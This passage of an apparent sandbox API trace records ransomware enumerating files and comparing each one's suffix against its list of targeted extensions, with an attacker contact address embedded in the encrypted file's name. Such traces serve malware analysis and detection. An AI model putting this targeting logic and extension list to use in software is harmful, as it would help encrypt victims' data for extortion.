dwReserved1=0x2e8, cFileName=".", cAlternateFileName="")) returned 0x48a130 [0283.263] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="..", cAlternateFileName="")) returned 1 [0283.266] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c498cf, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59c498cf, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59c95d9b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x233c8, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="GETCUR~2.MSP")) returned 1 [0283.267] lstrlenW (lpString="GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 62 [0283.267] lstrlenW (lpString=".1cd") returned 4 [0283.267] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0283.267] lstrlenW (lpString=".3ds") returned 4 [0283.267] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0283.267] lstrlenW (lpString=".3fr") returned 4 [0283.267] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0283.267] lstrlenW (lpString=".3g2") returned 4 [0283.267] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0283.267] lstrlenW (lpString=".3gp") returned 4 [0283.267] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0283.267] lstrlenW (lpString=".7z") returned 3 [0283.267] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0283.267] lstrlenW (lpString=".accda") returned 6 [0283.267] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0283.267] lstrlenW (lpString=".accdb") returned 6 [0283.267] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0283.267] lstrlenW (lpString=".accdc") returned 6 [0283.267] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0283.267] lstrlenW (lpString=".accde") returned 6 [0283.267] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0283.267] lstrlenW (lpString=".accdt") returned 6 [0283.267] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0283.267] lstrlenW (lpString=".accdw") returned 6 [0283.268] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0283.268] lstrlenW (lpString=".adb") returned 4 [0283.268] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".adp") returned 4 [0283.268] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai") returned 3 [0283.268] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0283.268] lstrlenW (lpString=".ai3") returned 4 [0283.268] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai4") returned 4 [0283.268] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai5") returned 4 [0283.268] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai6") returned 4 [0283.268] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai7") returned 4 [0283.268] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ai8") returned 4 [0283.268] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".anim") returned 5 [0283.268] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0283.268] lstrlenW (lpString=".arw") returned 4 [0283.268] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".as") returned 3 [0283.268] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0283.268] lstrlenW (lpString=".asa") returned 4 [0283.268] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".asc") returned 4 [0283.268] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0283.268] lstrlenW (lpString=".ascx") returned 5 [0283.268] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0283.268] lstrlenW (lpString=".asm") returned 4 [0283.268] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".asmx") returned 5 [0283.269] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0283.269] lstrlenW (lpString=".asp") returned 4 [0283.269] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".aspx") returned 5 [0283.269] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0283.269] lstrlenW (lpString=".asr") returned 4 [0283.269] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".asx") returned 4 [0283.269] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".avi") returned 4 [0283.269] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".avs") returned 4 [0283.269] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".backup") returned 7 [0283.269] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0283.269] lstrlenW (lpString=".bak") returned 4 [0283.269] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".bay") returned 4 [0283.269] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".bd") returned 3 [0283.269] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0283.269] lstrlenW (lpString=".bin") returned 4 [0283.269] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".bmp") returned 4 [0283.269] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".bz2") returned 4 [0283.269] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".c") returned 2 [0283.269] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0283.269] lstrlenW (lpString=".cdr") returned 4 [0283.269] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0283.269] lstrlenW (lpString=".cer") returned 4 [0283.270] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".cf") returned 3 [0283.270] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0283.270] lstrlenW (lpString=".cfc") returned 4 [0283.270] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".cfm") returned 4 [0283.270] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".cfml") returned 5 [0283.270] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0283.270] lstrlenW (lpString=".cfu") returned 4 [0283.270] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".chm") returned 4 [0283.270] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".cin") returned 4 [0283.270] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".class") returned 6 [0283.270] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0283.270] lstrlenW (lpString=".clx") returned 4 [0283.270] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".config") returned 7 [0283.270] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0283.270] lstrlenW (lpString=".cpp") returned 4 [0283.270] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".cr2") returned 4 [0283.270] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".crt") returned 4 [0283.270] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0283.270] lstrlenW (lpString=".crw") returned 4 [0283.270] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".cs") returned 3 [0283.271] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0283.271] lstrlenW (lpString=".css") returned 4 [0283.271] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".csv") returned 4 [0283.271] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".cub") returned 4 [0283.271] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dae") returned 4 [0283.271] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dat") returned 4 [0283.271] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".db") returned 3 [0283.271] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0283.271] lstrlenW (lpString=".dbf") returned 4 [0283.271] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dbx") returned 4 [0283.271] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dc3") returned 4 [0283.271] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dcm") returned 4 [0283.271] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dcr") returned 4 [0283.271] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".der") returned 4 [0283.271] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0283.271] lstrlenW (lpString=".dib") returned 4 [0283.272] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".dic") returned 4 [0283.272] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".dif") returned 4 [0283.272] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".divx") returned 5 [0283.272] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0283.272] lstrlenW (lpString=".djvu") returned 5 [0283.272] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0283.272] lstrlenW (lpString=".dng") returned 4 [0283.272] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".doc") returned 4 [0283.272] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".docm") returned 5 [0283.272] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0283.272] lstrlenW (lpString=".docx") returned 5 [0283.272] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0283.272] lstrlenW (lpString=".dot") returned 4 [0283.272] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0283.272] lstrlenW (lpString=".dotm") returned 5 [0283.272] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0283.272] lstrlenW (lpString=".dotx") returned 5 [0283.273] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0283.273] lstrlenW (lpString=".dpx") returned 4 [0283.273] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dqy") returned 4 [0283.273] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dsn") returned 4 [0283.273] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dt") returned 3 [0283.273] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0283.273] lstrlenW (lpString=".dtd") returned 4 [0283.273] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dwg") returned 4 [0283.273] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dwt") returned 4 [0283.273] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".dx") returned 3 [0283.273] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0283.273] lstrlenW (lpString=".dxf") returned 4 [0283.273] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0283.273] lstrlenW (lpString=".edml") returned 5 [0283.273] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0283.273] lstrlenW (lpString=".efd") returned 4 [0283.273] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".elf") returned 4 [0283.274] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".emf") returned 4 [0283.274] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".emz") returned 4 [0283.274] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".epf") returned 4 [0283.274] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".eps") returned 4 [0283.274] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".epsf") returned 5 [0283.274] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0283.274] lstrlenW (lpString=".epsp") returned 5 [0283.274] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0283.274] lstrlenW (lpString=".erf") returned 4 [0283.274] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".exr") returned 4 [0283.274] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".f4v") returned 4 [0283.274] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".fido") returned 5 [0283.274] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0283.274] lstrlenW (lpString=".flm") returned 4 [0283.274] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0283.274] lstrlenW (lpString=".flv") returned 4 [0283.275] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".frm") returned 4 [0283.275] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".fxg") returned 4 [0283.275] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".geo") returned 4 [0283.275] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".gif") returned 4 [0283.275] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".grs") returned 4 [0283.275] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".gz") returned 3 [0283.275] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0283.275] lstrlenW (lpString=".h") returned 2 [0283.275] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0283.275] lstrlenW (lpString=".hdr") returned 4 [0283.275] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".hpp") returned 4 [0283.275] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".hta") returned 4 [0283.275] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".htc") returned 4 [0283.275] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".htm") returned 4 [0283.275] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0283.275] lstrlenW (lpString=".html") returned 5 [0283.276] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0283.276] lstrlenW (lpString=".icb") returned 4 [0283.276] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".ics") returned 4 [0283.276] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".iff") returned 4 [0283.276] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".inc") returned 4 [0283.276] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".indd") returned 5 [0283.276] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0283.276] lstrlenW (lpString=".ini") returned 4 [0283.276] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".iqy") returned 4 [0283.276] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".j2c") returned 4 [0283.276] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".j2k") returned 4 [0283.276] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".java") returned 5 [0283.276] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0283.276] lstrlenW (lpString=".jp2") returned 4 [0283.276] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".jpc") returned 4 [0283.276] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0283.276] lstrlenW (lpString=".jpe") returned 4 [0283.277] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".jpeg") returned 5 [0283.277] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0283.277] lstrlenW (lpString=".jpf") returned 4 [0283.277] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".jpg") returned 4 [0283.277] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".jpx") returned 4 [0283.277] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".js") returned 3 [0283.277] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0283.277] lstrlenW (lpString=".jsf") returned 4 [0283.277] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".json") returned 5 [0283.277] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0283.277] lstrlenW (lpString=".jsp") returned 4 [0283.277] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".kdc") returned 4 [0283.277] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".kmz") returned 4 [0283.277] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".kwm") returned 4 [0283.277] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".lasso") returned 6 [0283.277] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0283.277] lstrlenW (lpString=".lbi") returned 4 [0283.277] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0283.277] lstrlenW (lpString=".lgf") returned 4 [0283.278] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".lgp") returned 4 [0283.278] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".log") returned 4 [0283.278] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".m1v") returned 4 [0283.278] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".m4a") returned 4 [0283.278] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".m4v") returned 4 [0283.278] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".max") returned 4 [0283.278] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".md") returned 3 [0283.278] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0283.278] lstrlenW (lpString=".mda") returned 4 [0283.278] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mdb") returned 4 [0283.278] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mde") returned 4 [0283.278] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mdf") returned 4 [0283.278] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mdw") returned 4 [0283.278] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mef") returned 4 [0283.278] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mft") returned 4 [0283.278] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0283.278] lstrlenW (lpString=".mfw") returned 4 [0283.279] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mht") returned 4 [0283.279] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mhtml") returned 6 [0283.279] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0283.279] lstrlenW (lpString=".mka") returned 4 [0283.279] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mkidx") returned 6 [0283.279] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0283.279] lstrlenW (lpString=".mkv") returned 4 [0283.279] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mos") returned 4 [0283.279] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mov") returned 4 [0283.279] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mp3") returned 4 [0283.279] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mp4") returned 4 [0283.279] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mpeg") returned 5 [0283.279] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0283.279] lstrlenW (lpString=".mpg") returned 4 [0283.279] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mpv") returned 4 [0283.279] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0283.279] lstrlenW (lpString=".mrw") returned 4 [0283.280] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".msg") returned 4 [0283.280] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".mxl") returned 4 [0283.280] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".myd") returned 4 [0283.280] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".myi") returned 4 [0283.280] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".nef") returned 4 [0283.280] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".nrw") returned 4 [0283.280] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".obj") returned 4 [0283.280] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".odb") returned 4 [0283.280] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".odc") returned 4 [0283.280] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".odm") returned 4 [0283.280] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".odp") returned 4 [0283.280] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0283.280] lstrlenW (lpString=".ods") returned 4 [0283.280] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".oft") returned 4 [0283.281] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".one") returned 4 [0283.281] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".onepkg") returned 7 [0283.281] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0283.281] lstrlenW (lpString=".onetoc2") returned 8 [0283.281] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0283.281] lstrlenW (lpString=".opt") returned 4 [0283.281] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".oqy") returned 4 [0283.281] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".orf") returned 4 [0283.281] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".p12") returned 4 [0283.281] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".p7b") returned 4 [0283.281] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".p7c") returned 4 [0283.281] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".pam") returned 4 [0283.281] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".pbm") returned 4 [0283.281] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".pct") returned 4 [0283.281] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0283.281] lstrlenW (lpString=".pcx") returned 4 [0283.281] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pdd") returned 4 [0283.282] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pdf") returned 4 [0283.282] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pdp") returned 4 [0283.282] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pef") returned 4 [0283.282] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pem") returned 4 [0283.282] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pff") returned 4 [0283.282] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pfm") returned 4 [0283.282] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pfx") returned 4 [0283.282] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".pgm") returned 4 [0283.282] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".php") returned 4 [0283.282] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0283.282] lstrlenW (lpString=".php3") returned 5 [0283.282] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0283.282] lstrlenW (lpString=".php4") returned 5 [0283.282] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0283.282] lstrlenW (lpString=".php5") returned 5 [0283.282] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0283.283] lstrlenW (lpString=".phtml") returned 6 